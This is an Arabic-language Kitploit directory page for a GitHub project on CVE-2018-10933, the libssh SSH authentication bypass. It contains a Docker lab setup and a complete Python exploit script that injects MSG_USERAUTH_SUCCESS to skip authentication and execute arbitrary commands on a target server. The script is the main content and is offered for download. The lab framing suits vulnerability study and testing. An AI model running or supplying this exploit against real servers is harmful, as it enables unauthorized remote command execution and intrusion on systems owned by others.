Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Libssh-server-CVE-2018-10933 — استغلال دليلي لـ CVE-2018-10933، يوضح تجاوز مصادقة SSH عبر حقن MSG_USERAUTH_SUCCESS. يتضمن إعداد Docker ونص Python لتنفيذ الأوامر عن بُعد. | Kitploit
أدوات/GitHubGitHub/cyberharsh/libssh-server-cve-2018-10933
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالمصادقةاستغلال الملفات الثنائية
GitHubcyberharsh/libssh-server-cve-2018-10933

Libssh-server-CVE-2018-10933

استغلال دليلي لـ CVE-2018-10933، يوضح تجاوز مصادقة SSH عبر حقن MSG_USERAUTH_SUCCESS. يتضمن إعداد Docker ونص Python لتنفيذ الأوامر عن بُعد.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 6 سنواتلم تتم المراجعة بعد

ثغرة تجاوز المصادقة في libssh (CVE-2018-10933)

中文版本(Chinese version)

libssh هي مكتبة C متعددة المنصات تنفذ بروتوكول SSHv2 على جانب العميل والخادم. تم العثور على ثغرة منطقية في آلة الحالة الخاصة بالخادم في libssh. يمكن للمهاجم إرسال رسالة MSG_USERAUTH_SUCCESS قبل نجاح المصادقة. مما يسمح بتجاوز المصادقة والوصول إلى خادم SSH الهدف.

المراجع:

  • https://www.libssh.org/security/advisories/CVE-2018-10933.txt
  • https://www.seebug.org/vuldb/ssvid-97614

الإعداد

ابدأ البيئة:

root@kitploit:~
docker-compose up -d

بعد بدء البيئة، يمكننا الاتصال بالمنفذ your-ip:2222 (اسم المستخدم وكلمة المرور: myuser:mypassword)، وهو تسجيل دخول SSH شرعي:

الاستغلال

بالرجوع إلى إثبات المفهوم (POC) المقدم في https://www.seebug.org/vuldb/ssvid-97614، يمكننا استخدام النص البرمجي التالي لإثبات الثغرة.

root@kitploit:~
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

يمكنك تنفيذ أوامر عشوائية على الخادم الهدف كما يلي:

تنزيل الأداة